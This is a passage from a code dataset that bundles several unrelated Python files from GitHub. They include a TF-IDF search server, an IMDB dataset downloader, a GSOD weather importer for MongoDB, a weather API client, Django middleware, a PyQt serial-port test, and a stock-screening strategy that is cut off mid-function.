TfidfVectorizer(vocabulary=self.terms, analyzer=_analyze_query)\n q = vectorizer.fit_transform([q])\n\n self.last_query[token] = q\n similarities = self._get_similarities(q)\n documents = np.argsort(similarities)[-count:][::-1]\n documents = [doc for doc in documents if similarities[doc] > 0]\n\n if documents:\n result = {\n 'action': 'report',\n 'success': True,\n 'results': [\n {\n 'document': self.doc_names[doc],\n 'match': similarities[doc]\n } for doc in documents\n ]\n }\n else:\n result = {\n 'action': 'report',\n 'success': False\n }\n return json.dumps(result)\n\n def update_query(self, token, doc_name, positive, count):\n q = self.last_query[token]\n j = bisect_left(self.doc_names, doc_name)\n d = self.w[:, j].transpose()\n if positive:\n q += d\n else:\n q -= d\n return self.query(token, q, count)\n\n\nclass GeneralizedVector(Vector):\n def __init__(self):\n super().__init__()\n self.k = None\n\n def _calculate_wong_k(self):\n w = np.array(self.w.todense()).tolist()\n minterms = []\n for j in range(self.doc_count):\n m = 0\n for i in range(self.term_count):\n m += 2 ** i if w[i][j] else 0\n minterms.append(m)\n\n # Calculate correlations\n m = sorted(list(set(minterms)))\n c = np.zeros((self.term_count, len(m))).tolist()\n for i in range(self.term_count):\n for j in range(self.doc_count):\n r = bisect_left(m, minterms[j])\n c[i][r] += w[i][j]\n\n # Calculate the index term vectors as linear combinations of minterm vectors\n k = []\n for i in range(self.term_count):\n num = reduce(\n lambda acum, r: acum + np.array([c[i][r] if 2 ** l & m[r] else 0 for l in range(self.term_count)]),\n range(len(m)),\n np.zeros(self.term_count)\n )\n k.append(num / np.linalg.norm(num))\n\n return np.array(k)\n\n def _calculate_pearson_k(self):\n A = self.freq.astype(np.float64)\n n = A.shape[1]\n\n # Compute the covariance matrix\n rowsum = A.sum(1)\n centering = rowsum.dot(rowsum.T.conjugate()) / n\n C = (A.dot(A.T.conjugate()) - centering) / (n - 
1)\n\n # The correlation coefficients are given by\n # C_{i,j} / sqrt(C_{i} * C_{j})\n d = np.diag(C)\n k = C / np.sqrt(np.outer(d, d))\n\n return np.abs(k)\n\n def _get_similarities(self, q):\n q = q.dot(self.k)\n d = self.w.transpose().dot(self.k)\n\n similarities = cosine_similarity(q, d).tolist()[0]\n return similarities\n\n def build(self, path):\n super().build(path)\n self.k = self._calculate_wong_k()\n\n\nclass TCPHandler(socketserver.BaseRequestHandler):\n def handle(self):\n global MODEL, ACTIVE_MODEL\n request = utils.receive_json(self.request)\n start = time.time()\n\n if request['action'] == 'set_model':\n model = request['model']\n if model in MODELS:\n ACTIVE_MODEL = request['model']\n MODEL = MODELS[ACTIVE_MODEL]()\n else:\n self.request.sendall(json.dumps({\n 'action': 'error',\n 'message': 'Incorrect model selected.'\n }).encode())\n elif request['action'] == 'get_model':\n self.request.sendall(json.dumps({\n 'action': 'report',\n 'model': ACTIVE_MODEL\n }).encode())\n elif request['action'] == 'build':\n success = True\n # noinspection PyBroadException\n try:\n MODEL.build(request['path'])\n except Exception:\n success = False\n self.request.sendall(json.dumps({\n 'action': 'report',\n 'success': success\n }).encode())\n elif request['action'] == 'query':\n self.request.sendall(\n MODEL.query(\n request['token'],\n request['query'],\n request['count'],\n request['continuation']\n ).encode()\n )\n elif request['action'] == 'update_query':\n self.request.sendall(\n MODEL.update_query(request['token'], request['document'], request['positive'],\n request['count']).encode()\n )\n else:\n self.request.sendall(json.dumps({\n 'action': 'error',\n 'message': 'Invalid action.'\n }).encode())\n\n print('Processed action \"%s\" in %.2f seconds' % (request['action'], time.time() - start))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('network')\n parser.add_argument('--model', default='Vector')\n args = parser.parse_args()\n\n ACTIVE_MODEL = args.model\n MODELS = {\n 'Vector': Vector,\n 'GeneralizedVector': GeneralizedVector\n }\n MODEL = MODELS[ACTIVE_MODEL]()\n NETWORK = json.load(open(args.network))\n\n server = socketserver.TCPServer((NETWORK['models']['host'], NETWORK['models']['port']), TCPHandler)\n server.serve_forever()\n","repo_name":"ealmuina/search-engine","sub_path":"engine/modules/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72399748034","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jun 10 10:53:32 2021\n\n@author: ilegra\n\"\"\"\nimport subprocess\nfrom os import path\n\nfiles_path = path.dirname(path.realpath(__file__))\n\nname_basics_url = ' https://datasets.imdbws.com/name.basics.tsv.gz'\ntitle_basics_url = ' https://datasets.imdbws.com/title.basics.tsv.gz'\ntitle_principals_url = ' https://datasets.imdbws.com/title.principals.tsv.gz'\nurl_lst = [name_basics_url, title_basics_url, title_principals_url]\n\nname_basics_path = '/datasets/name.basics/'\ntitle_basics_path = '/datasets/title.basics/'\ntitle_principals_path = '/datasets/title.principals/'\npath_lst = [name_basics_path, title_basics_path, title_principals_path]\n\nname_basics_file = 'name.basics.tsv.gz'\ntitle_basics_file = 'title.basics.tsv.gz'\ntitle_principals_file = 'title.principals.tsv.gz'\nfile_lst = [name_basics_file, title_basics_file, title_principals_file]\n\ndef 
download_datasets():\n print('Downloading datasets...')\n \n subprocess.call('rm -rf datasets', shell=True)\n subprocess.call('mkdir datasets', shell=True)\n for index in range(3):\n subprocess.call('wget -P ' + files_path + path_lst[index] + url_lst[index], shell = True)\n \n print('Datasets download was completed.')\n \ndef unzip_datasets():\n print('Decompressing datasets...')\n \n for index in range(3):\n subprocess.call('gunzip ' + files_path + path_lst[index] + file_lst[index], shell = True)\n \n print('Datasets decompress was completed.')\n\n\ndownload_datasets()\nunzip_datasets()\n","repo_name":"ibragionp/devops-and-cloud-basics","sub_path":"tema06/get_datasets.py","file_name":"get_datasets.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35351042784","text":"from celery import shared_task\nfrom django.contrib.auth.models import User\nimport time\n\n\n@shared_task\ndef add(x, y, *args, **kwargs):\n print(kwargs)\n user = User.objects.get(id=kwargs.get('uid', 1))\n print(f\"任务函数add 正在执行...\\n用户{user.username}\")\n time.sleep(2)\n return x + y\n\n\n@shared_task\ndef generic(*args, **kwargs):\n print(\"generic task running...\")\n print(f\"args:\\t{args}\\nkwargs:\\t{kwargs}\")\n","repo_name":"Heaciy/cron","sub_path":"task/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26930511508","text":"import os\nfrom argparse import ArgumentParser\nfrom collections import OrderedDict\nfrom math import isnan\n\nimport pandas as pd\nimport pymongo\n\nfrom gsodtools.getdb import get_db\n\n\ndef load_fips(country):\n # Load FIPS country codes\n fips = pd.read_csv(country, sep=r\"\\s{2,}\", names=[\n \"CTRY\", \"CTRY_NAME\"], engine='python')\n\n return fips\n\n\ndef load_station(station):\n # Load station data\n station = pd.read_csv(station, usecols=[\"USAF\", \"WBAN\", \"CTRY\"],\n dtype={\"USAF\": str, \"WBAN\": str})\n\n station = station.drop(station[station[\"CTRY\"].isnull()].index)\n station = pd.concat((station, station.loc[:, ['USAF', 'WBAN']].apply(\n ''.join, axis=1).rename(\"STATION\")), axis=1)\n station = station.set_index(\"STATION\")\n\n return station\n\n\ndef load_data(folder, stationdata, database):\n # Load data from folder\n for root, _, files in os.walk(folder):\n for file in files:\n if file.endswith(\".csv\"):\n weatherdata = pd.read_csv(os.path.join(root, file), usecols=[\n \"STATION\", \"DATE\", \"LATITUDE\",\n \"LONGITUDE\", \"ELEVATION\", \"NAME\",\n \"TEMP\", \"DEWP\", \"SLP\", \"STP\",\n \"VISIB\", \"WDSP\", \"MXSPD\", \"GUST\",\n \"MAX\", \"MIN\", \"PRCP\", \"SNDP\", \"FRSHTT\"],\n na_values=['9999.9', '999.9', '99.99'],\n parse_dates=['DATE'], index_col=['DATE'],\n infer_datetime_format=True, dtype={\"STATION\": str, \"FRSHTT\": str})\n\n if weatherdata[\"LATITUDE\"][0] != 0.0:\n print(f\"{root}\\\\{file} processing\")\n\n try:\n station = stationdata.loc[weatherdata[\"STATION\"][0]]\n except KeyError as exception:\n print(f\"Station {exception.args[0]} not found\")\n continue\n\n process_data(weatherdata, station, database)\n\n else:\n print(f\"{root}\\\\{file} skipped\")\n\n\ndef process_data(data, station, database):\n station_id = data[\"STATION\"][0]\n station_dict = station.to_dict()\n country = OrderedDict([(\"fips\", station_dict[\"CTRY\"]),\n (\"name\", station_dict[\"CTRY_NAME\"])])\n station_dict = 
OrderedDict([(\"_id\", station_id), (\"name\", data[\"NAME\"][0]),\n (\"usaf\", station_dict[\"USAF\"]),\n (\"wban\", station_dict[\"WBAN\"]),\n (\"country\", country), (\"location\", {\n \"type\": \"Point\",\n \"coordinates\": [data[\"LONGITUDE\"][0], data[\"LATITUDE\"][0]]}),\n (\"elevation\", data[\"ELEVATION\"][0])])\n\n try:\n database[\"stations\"].update_one(\n {\"_id\": station_id}, {\"$set\": station_dict}, upsert=True)\n except pymongo.errors.WriteError:\n print(f\"Station {station_id} failed\")\n\n data = data.drop(columns=[\"STATION\", \"NAME\", \"LATITUDE\", \"LONGITUDE\",\n \"ELEVATION\"])\n\n insert_query = []\n data_dict = data.to_dict(orient=\"index\", into=OrderedDict)\n\n for key, value in data_dict.items():\n temp = value[\"FRSHTT\"]\n indicators = OrderedDict([(\"fog\", temp[0]), (\"rain\", temp[1]), (\"snow\", temp[2]),\n (\"hail\", temp[3]), (\"thunder\", temp[4]), (\"tornado\", temp[5])])\n\n summary = OrderedDict()\n summary[\"temperature\"] = value[\"TEMP\"]\n summary[\"dewPoint\"] = value[\"DEWP\"]\n summary[\"seaLevelPressure\"] = value[\"SLP\"]\n summary[\"stationPressure\"] = value[\"STP\"]\n summary[\"visibility\"] = value[\"VISIB\"]\n summary[\"windSpeed\"] = value[\"WDSP\"]\n summary[\"maxSustainedWindSpeed\"] = value[\"MXSPD\"]\n summary[\"gust\"] = value[\"GUST\"]\n summary[\"maxTemperature\"] = value[\"MAX\"]\n summary[\"minTemperature\"] = value[\"MIN\"]\n summary[\"precipitation\"] = value[\"PRCP\"]\n summary[\"snowDepth\"] = value[\"SNDP\"]\n summary = {k: summary[k] for k in summary if not isnan(summary[k])}\n summary[\"indicators\"] = indicators\n\n datarow = OrderedDict(\n [(\"station\", station_dict), (\"timestamp\", key)])\n datarow.update(summary)\n\n insert_query.append(datarow)\n\n try:\n database[\"weatherData\"].insert_many(insert_query)\n except pymongo.errors.DuplicateKeyError as exception:\n print(exception)\n except pymongo.errors.BulkWriteError as exception:\n print(exception)\n except pymongo.errors.WriteError as exception:\n print(exception)\n\n\ndef parse_arg():\n parser = ArgumentParser(description='Import GSOD data into MongoDB')\n parser.add_argument(\n 'folder', help='Folder containing GSOD data')\n parser.add_argument('country', help='Country FIPS file')\n parser.add_argument('station', help='ISD History file')\n\n return parser.parse_args()\n\n\ndef main():\n args = parse_arg()\n\n countrydata = load_fips(args.country)\n stationdata = load_station(args.station)\n stationdata = stationdata.reset_index().merge(\n countrydata, on=['CTRY'], how='left')\n stationdata = stationdata.set_index(\"STATION\")\n\n client = get_db(1)\n\n database = client[\"gsod\"]\n load_data(args.folder, stationdata, database)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"KohGeek/GSODAnalysis","sub_path":"src/importdb.py","file_name":"importdb.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5438256295","text":"#! python3\r\n\"\"\" spring 2021\r\nPrints the current weather for my location. 
\"\"\"\r\nimport sys\r\nimport json\r\nimport pathlib\r\nimport requests\r\nimport datetime\r\n\r\nUSAGE = f\"USAGE: python3 {sys.argv[0]} apikey\"\r\n\r\n# weatherbit:\r\nurl = \"https://api.weatherbit.io/v2.0/current\"\r\nlocation = \"515012\"\r\nif len(sys.argv) == 2:\r\n apikey = sys.argv[1]\r\nelse:\r\n print(USAGE)\r\n sys.exit(0)\r\n\r\n\r\n# check if data file exists in folder;\r\n# check file lifetime;\r\ninfo = None\r\nrequest = False\r\nfilename = pathlib.Path(\"weatherbit.json\")\r\n\r\nif filename.exists():\r\n file_mtime = filename.stat().st_mtime\r\n file_mtime = datetime.datetime.fromtimestamp(file_mtime)\r\n lifetime = file_mtime + datetime.timedelta(hours=10)\r\n if datetime.datetime.now() < lifetime:\r\n print(\"Last request less than 10 hours.\")\r\n with open(\"weatherbit.json\") as file:\r\n data = json.loads(\r\n json.load(file)\r\n )\r\n info = data['data'][0]\r\n else:\r\n request = True\r\nelse:\r\n request = True\r\n\r\n# request json;\r\nif request is True:\r\n try:\r\n answer = requests.get(\r\n url=url, params=dict(city_id=location, key=apikey)\r\n )\r\n answer.raise_for_status()\r\n with open(\"weatherbit.json\", 'w') as write_file:\r\n json.dump(answer.text, write_file)\r\n data = json.loads(answer.text)\r\n info = data['data'][0]\r\n print(\"New json data requested.\")\r\n except OSError as error:\r\n print(\"ERROR.\", error)\r\n sys.exit(1)\r\n except Exception as alert:\r\n print(\"ALERT.\", alert)\r\n sys.exit(2)\r\n\r\n# format;\r\nlocation = f\"{info['timezone']}, {location}; {info['city_name']}.\"\r\ndate = f\"Request time: {info['ob_time']}\"\r\ntemperature = f\"Temperature: {info['temp']}\"\r\napparent = f\"Feels like: {info['app_temp']}\"\r\nwind_direction = f\"Wind direction: {info['wind_cdir_full']}\"\r\n\r\nws = info['wind_spd']\r\nif ws <= 1.5:\r\n text = \"calm \"\r\nelif ws <= 5:\r\n text = \"light breeze \"\r\nelif ws <= 9:\r\n text = \"moderate breeze \"\r\nelif ws <= 12:\r\n text = \"wind \"\r\nelif ws <= 16:\r\n text = \"moderate wind \"\r\nelif ws <= 18:\r\n text = \"STRONG WIND \"\r\nelif ws <= 20:\r\n text = \"STORM WIND! \"\r\nelse:\r\n text = \"DON'T LEAVE THE ROOM!!! 
\"\r\nws = text + format(ws, '.1f')\r\nwind_speed = f\"Wind speed: {ws}\"\r\n\r\nuvi = info['uv']\r\nif uvi <= 2:\r\n uvi = \"green\"\r\nelif uvi <= 5:\r\n uvi = \"yellow...\"\r\nelif uvi <= 7:\r\n uvi = \"orange!\"\r\nelif uvi <= 10:\r\n uvi = \"RED!!!\"\r\nelse:\r\n uvi = \"DON'T LEAVE THE ROOM!!!\"\r\nuv_index = f\"UV Index: {uvi}\"\r\n\r\nepa = info['aqi']\r\nif epa <= 50:\r\n epa = \"good green air.\"\r\nelif epa <= 100:\r\n epa = \"yellow moderate pollute.\"\r\nelif epa <= 150:\r\n epa = \"orange unhealthy pollution!\"\r\nelif epa <= 200:\r\n epa = \"RED HIGH POLLUTION!\"\r\nelif epa <= 300:\r\n epa = \"PURPLE VERY UNHEALTHY EMISSIONS!\"\r\nelse:\r\n epa = \"MAROON HAZARDOUS!!!\"\r\nair_quality = f\"Air Quality: {epa}\"\r\n\r\noutput = [location, date, temperature, apparent, wind_direction,\r\n wind_speed, uv_index, air_quality]\r\n\r\n# output.\r\nprint(*output, sep='\\n')\r\nsys.exit(0)\r\n","repo_name":"voronokKita/garage","sub_path":"Python/Automate the Boring Stuff with Python, Al Sweigart/14 json, api/weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3096,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72349590275","text":"from .models import *\nclass RequestCountMiddleware:\n def __init__(self, get_response):\n self.get_response = get_response\n\n def __call__(self, request):\n # Retrieve the request count from the database\n request_counter, created = RequestCounter.objects.get_or_create(pk=1)\n request_count = request_counter.count\n\n # Increment the request count\n request_count += 1\n request_counter.count = request_count\n request_counter.save()\n\n response = self.get_response(request)\n return response","repo_name":"srvpl07/Movie-Collection","sub_path":"apps/collection/request_count_middleware.py","file_name":"request_count_middleware.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21501556325","text":"import requests\nimport lxml\nfrom bs4 import BeautifulSoup as bsp\n\nweb_page_html = requests.get('https://www.worldstandards.eu/other/tlds/').text\nweb_page = bsp(web_page_html,'html.parser')\n\n\n# print(web_page.find_all(class_ = 'table table-striped'))\ntable = web_page.find_all(class_ = 'table table-striped')[0]\nprint(type(table))\nprint(len(web_page.find_all(class_ = 'table table-striped')))\nlist_data = table.findAll('td')\nwith open('./data/country_domain.csv',mode='w+') as file:\n for index, item in enumerate(list_data):\n if index % 2 == 0:\n file.write(item.text + ', ')\n else:\n file.write(item.text + '\\n')\n\n\n# for table in web_page.find_all(class_ = 'table table-striped'):\n# table.tbody.","repo_name":"trantrikien239/exercise","sub_path":"decode_a_webpage_17.py","file_name":"decode_a_webpage_17.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19043525723","text":"import sys\nfrom PyQt5.QtWidgets import QApplication, QWidget\nfrom cipher import MyApp\nimport cipher as c\nimport time\nimport serial\nfrom PyQt5.QtWidgets import QLabel, QLineEdit, QPushButton, QVBoxLayout\n\nser = serial.Serial(\n port = \"/dev/ttyUSB1\",\n baudrate = 115200,\n bytesize = serial.EIGHTBITS, \n parity = serial.PARITY_NONE,\n stopbits = serial.STOPBITS_ONE, \n timeout = 0.5,\n xonxoff = True,\n rtscts = False,\n dsrdtr = False,\n writeTimeout = 0.5\n )\n\nclass MyApp(QWidget):\n\n 
def __init__(self):\n        super().__init__()\n        self.initUI()\n\n    def initUI(self):\n        vbox = QVBoxLayout()\n        # keep a reference so the serial polling loop can update the visible widget\n        self.edit = QLineEdit('abc')\n        vbox.addWidget(self.edit)\n        self.setLayout(vbox)\n\n        self.setWindowTitle('My First Application')\n        self.move(300, 300)\n        self.resize(400, 200)\n        self.show()\n\nif __name__ == '__main__':\n    app = QApplication(sys.argv)\n    ex = MyApp()\n\n    check_flag = ser.isOpen()\n    print(\"Polling Comm port Check :\", check_flag, \"\\n\")\n\n    while check_flag:\n        if ser.readable(): \n            res = ser.readline() \n            # decode before trimming: len(res) counts bytes, not characters\n            ex.edit.setText(res.decode().strip())\n            app.processEvents()  # let Qt repaint while we poll the serial port\n\n    ser.close()\n\n    sys.exit(app.exec_())","repo_name":"riverSun1/Cipher-Pro","sub_path":"20220209/cipher_pc/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32725314883","text":"import numpy as np\r\nimport tensorflow as tf\r\n\r\ndef MinMaxScaler(x):\r\n    col_min = np.min(x, axis = 0)\r\n    col_max = np.max(x, axis = 0)\r\n    denominator = (col_max - col_min) + 1e-7\r\n    numerator = x - col_min\r\n    return numerator/denominator\r\n\r\nSEED = 0\r\nSAVE_DIR = './data/pendigits.tfrecords'\r\n\r\npendigits_train = np.loadtxt('./data/pendigits_train.csv', delimiter = ',')\r\npendigits_test = np.loadtxt('./data/pendigits_test.csv', delimiter = ',')\r\n\r\npendigits_data = np.append(pendigits_train, pendigits_test, axis = 0)\r\nnsamples = np.size(pendigits_data, 0)\r\n\r\nnp.random.seed(SEED)\r\nmask = np.random.permutation(nsamples)\r\npendigits_data = pendigits_data[mask]\r\nx_data = MinMaxScaler(pendigits_data[:,:-1])\r\ny_data = pendigits_data[:,-1].astype(int)\r\n\r\nndim = np.size(x_data, 1)\r\n\r\nwriter = tf.python_io.TFRecordWriter(SAVE_DIR)\r\nexample = tf.train.Example(features = tf.train.Features(feature = {\r\n        'features':tf.train.Feature(float_list = tf.train.FloatList(value = x_data.flatten())),\r\n        'label':tf.train.Feature(int64_list = tf.train.Int64List(value = y_data))\r\n    }))\r\nwriter.write(example.SerializeToString())\r\nwriter.close()","repo_name":"ghlee0304/tensorflow-basic-and-advanced","sub_path":"Basic/lab04_5_data_manipulation_tfrecord_write.py","file_name":"lab04_5_data_manipulation_tfrecord_write.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73483671555","text":"from nicegui import ui\nimport components\nimport global_state\nimport persistence\n\n\ndef requirement_list(product_yarn_records: list):\n    total = total_price(product_yarn_records=product_yarn_records)\n    sum_unit = total_unit(product_yarn_records=product_yarn_records)\n    with ui.grid(columns=7):\n        for product_yarn_record in product_yarn_records:\n            ui.label(text=product_yarn_record[\"yarn_name\"])\n            ui.button(color=product_yarn_record[\"yarn_color\"])\n            ui.label(text=product_yarn_record[\"yarn_price_per_unit\"])\n            ui.label(text=\"VND\")\n            ui.label(text=\"x\")\n            ui.label(text=product_yarn_record[\"yarn_count\"])\n            if product_yarn_record[\"yarn_count\"] == 1:\n                ui.label(\"ball\")\n            else:\n                ui.label(\"balls\")\n\n        ui.label(text=\"Total\").classes(add=\"text-lg\")\n        ui.element()\n        ui.label(text=str(total)).classes(add=\"text-lg\")\n        ui.label(text=\"VND\").classes(add=\"text-lg\")\n        ui.label(text=\" \")\n        ui.label(text=str(sum_unit)).classes(add=\"text-lg\")\n        if sum_unit == 1:\n            ui.label(\"ball\").classes(add=\"text-lg\")\n        else:\n            ui.label(\"balls\").classes(add=\"text-lg\")\n\n\ndef 
total_price(product_yarn_records: list):\n result = 0\n for requirement in product_yarn_records:\n result += requirement[\"yarn_price_per_unit\"] * requirement[\"yarn_count\"]\n return result\n\n\ndef total_unit(product_yarn_records: list):\n result = 0\n for requirement in product_yarn_records:\n result += requirement[\"yarn_count\"]\n return result\n\n\n@ui.page(\"/product/{id_}\")\ndef page(id_: str):\n product = global_state.get_product(id_=id_)\n ui.label(text=product[\"name\"]).classes(add=\"text-2xl\")\n with ui.row():\n ui.image(source=product[\"image_url\"]).style(add=\"width: 400px\")\n with ui.column():\n ui.label(text=\"Materials\").classes(add=\"text-lg\")\n product_yarn_records = persistence.get_product_yarns(product_id=id_)\n requirement_list(product_yarn_records=product_yarn_records)\n ui.label(text=\"Description\").classes(add=\"text-lg\")\n ui.markdown(content=product[\"description\"])\n ui.label(text=\"Patterns\").classes(add=\"text-lg\")\n ui.markdown(content=product[\"patterns\"])\n\n def handle_delete_product():\n global_state.delete_product(id_=id_)\n global_state.refresh_products()\n\n # Ensure that the current page does not become invalid after we remove\n # one product.\n #\n # For example:\n # - Our page size is 6, and\n # - There is precisely 13 products, then\n # - We are going to have 3 pages.\n # - Removing one product means the maximal page number becomes 2.\n #\n # If the current page number is 3, then we are going to have invalid\n # state on clicking \"Back\".\n #\n max_page = global_state.calculate_max_page()\n if global_state.get_page() >= max_page:\n global_state.set_page(max_page)\n\n components.product_pagination.refresh()\n components.product_gallery.refresh()\n ui.open(target=\"/\")\n\n with ui.dialog() as dialog, ui.card():\n ui.label(text=\"Are you sure you want to delete this?\")\n with ui.row():\n ui.button(text=\"Yes\").on(\n \"click\",\n lambda _: handle_delete_product()\n )\n ui.button(text=\"No\").on(\n \"click\",\n lambda _: dialog.close()\n )\n\n with ui.row().bind_visibility_from(\n target_object=global_state.dict_,\n target_name=\"logged_in_user\",\n backward=lambda value: value is not None,\n ):\n ui.button(text=\"Edit Product\").on(\n \"click\",\n lambda _: ui.open(target=f\"/edit-product/{id_}\"),\n )\n ui.button(text=\"Delete Product\", color=\"deep-orange\").on(\n \"click\",\n lambda _: dialog.open(),\n )\n\n ui.link(text=\"Back\", target=\"/\")\n\n","repo_name":"thanhnguyen2187/knitten","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":4042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16924093485","text":"from datetime import datetime\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\nfrom ....Data.Engine.DyStockDataEngine import *\nfrom ..DyStockSelectStrategyTemplate import *\nfrom ....Data.Utility.DyStockDataSpider import *\n\n\nclass DySS_High2SendStocks(DyStockSelectStrategyTemplate):\n \"\"\"\n 高送转主要因子:\n 每股公积金: >= 5\n 每股未分配利润: >= 1\n 总股本(亿): <= 2\n 股本因子: 1\n 机构持仓比例低\n 高成长性: 营业收入和净利润增长,首先看营业收入(可以列为可选,但还是比较重要的)\n 最近解禁日期: 配合出货(可选因子)\n 每股净资产:>=5(可选因子)\n\n 高转送炒作时间:\n 5月左右炒中报\n 10~11月左右炒年报,有些高增长的可能9月底炒作。9月可以结合大盘开始布局\n \"\"\"\n name = 'DySS_High2SendStocks'\n chName = '高送转'\n\n colNames = ['代码', '名称', '排名', '得分', '现价', '每股净资产(元)', '每股公积金(元)', '每股未分配利润(元)',\n '流通A股(亿)', '总股本(亿)', '流通市值(亿元)', '总市值(亿元)',\n '最近解禁日期', '解禁股占总股本比例(%)',\n '股本因子', '最近送转日期', '机构持股占流通股比例(%)',\n '净利润YoY(%)', '营业收入YoY(%)', 
'每股收益(元)', '每股现金流(元)',\n                '上市日期'\n                ]\n\n    param = OrderedDict\\\n        ([\n            ('基准日期', datetime.today().strftime(\"%Y-%m-%d\")),\n            ('选几只股票', 0)\n        ])\n\n    paramToolTip = {'选几只股票': '0:所有股票'}\n\n    fullyPushDays = True # 全推所有股票的日线数据\n\n    # 策略参数\n    dividendPlanGrepDetail = re.compile('(\\d+)股?(?:送({0})股?)?(?:转增?({0})股?)?'.format('\\d+(?:\\.\\d+)?'))\n\n    def __init__(self, param, info):\n        super().__init__(param, info)\n\n        # unpack parameters\n        self._baseDate = param['基准日期']\n        self._selectStockNbr = param['选几只股票']\n\n        self.__data = {}\n\n    def onDaysLoad(self):\n        return self._baseDate, 0\n\n    def onInit(self, dataEngine, errorDataEngine):\n        self._stockAllCodes = dataEngine.daysEngine.stockAllCodes\n\n        errorInfo = DyErrorInfo(dataEngine.eventEngine)\n        errorDataEngine = DyStockDataEngine(dataEngine.eventEngine, errorInfo, registerEvent=False)\n        self._errorDaysEngine = errorDataEngine.daysEngine\n    \n    def _getShareFactor(self, dividendPlan):\n        \"\"\"\n        根据同花顺的'分红方案说明'计算股本因子\n\n        匹配的文本格式:\n        dividendPlan = '10送5股转25股派1.25元(含税)'\n        dividendPlan = '10送5股派1.25元(含税)'\n        dividendPlan = '10转25股派1.25元(含税)'\n        dividendPlan = '10股转10.090840股派0.504542元(含税)'\n        dividendPlan = '10转增2股派2.5元(含税)'\n        \"\"\"\n        match = self.dividendPlanGrepDetail.match(dividendPlan)\n        if match:\n            groups = match.groups()\n\n            base = int(groups[0])\n            sum = 0\n            for group in groups[1:]:\n                try:\n                    group = float(group)\n                    sum += group\n                except Exception as ex:\n                    pass\n\n            shareFactor = (sum + base)/base\n        else:\n            shareFactor = 1\n\n        return shareFactor\n\n    def _getIndicators(self, code):\n        \"\"\"\n        @return: ['每股净资产(元)', '每股公积金(元)', '每股未分配利润(元)', '流通A股(亿)', '总股本(亿)',\n                  '最近解禁日期', '解禁股占总股本比例(%)', '股本因子', '最近送转日期',\n                  '净利润YoY(%)', '营业收入YoY(%)', '每股收益(元)', '每股现金流(元)'\n                 ]\n        \"\"\"\n        mainLink = 'http://basic.10jqka.com.cn/16/{0}/'.format(code[:-3])\n        r = requests.get(mainLink)\n        soup = BeautifulSoup(r.text, 'lxml')\n\n        tag = soup.find('h2', text='财务指标')\n        tag = tag.parent.parent\n        tag = tag.find('tbody')\n        tag = tag.find('tr')\n        tags = tag.find_all('td')\n        nextTrTag = tag.next_sibling.next_sibling # 由于业绩快报原因,可能每股公积金和每股未分配利润还没出来,则用前期的。\n        nextTdTags = nextTrTag.find_all('td')\n\n        for i, tag in enumerate(tags):\n            if i == 2: # 每股净资产(Net asset value per share)\n                navps = DyCommon.toFloat(tag.string)\n\n            elif i == 3: # 每股公积金(Provident fund per share)\n                pfps = DyCommon.toFloat(tag.string, None)\n                if pfps is None:\n                    pfps = DyCommon.toFloat(nextTdTags[3].string)\n\n            elif i == 4: # 每股未分配利润(Undistributed profit per share)\n                udpps = DyCommon.toFloat(tag.string, None)\n                if udpps is None:\n                    udpps = DyCommon.toFloat(nextTdTags[4].string)\n\n        tag = soup.find('span', text='流通A股:')\n        tag = tag.next_sibling\n        floatingShares = float(tag.text[:-2]) # 流通A股(亿)\n\n        tag = soup.find('span', text='总股本:')\n        tag = tag.next_sibling.next_sibling\n        totalShares = float(tag.text[:-2]) # 总股本(亿)\n\n        # get 股本结构 page\n        tag = soup.find('a', text='股本结构')\n        link = mainLink + tag.attrs['href'][2:]\n        r = requests.get(link)\n        soup = BeautifulSoup(r.text, 'lxml')\n\n        latestReleaseDate = None\n        latestBanSharesPct = None\n        tag = soup.find('h2', text='解禁时间表')\n        if tag is not None:\n            tag = tag.parent.parent.find('tbody')\n            tags = tag.find_all('tr')\n\n            todayDate = datetime.now().strftime(\"%Y-%m-%d\")\n            for tag in tags:\n                # 解禁日期\n                tag_ = tag.find('th')\n                releaseDate = str(tag_.string)\n\n                if releaseDate > todayDate:\n                    if latestReleaseDate is None:\n                        latestReleaseDate = releaseDate\n                    else:\n                        if releaseDate < latestReleaseDate:\n                            latestReleaseDate = releaseDate\n\n                    if latestReleaseDate == releaseDate:\n                        # 解禁股占总股本比例(%)\n                        tags_ = 
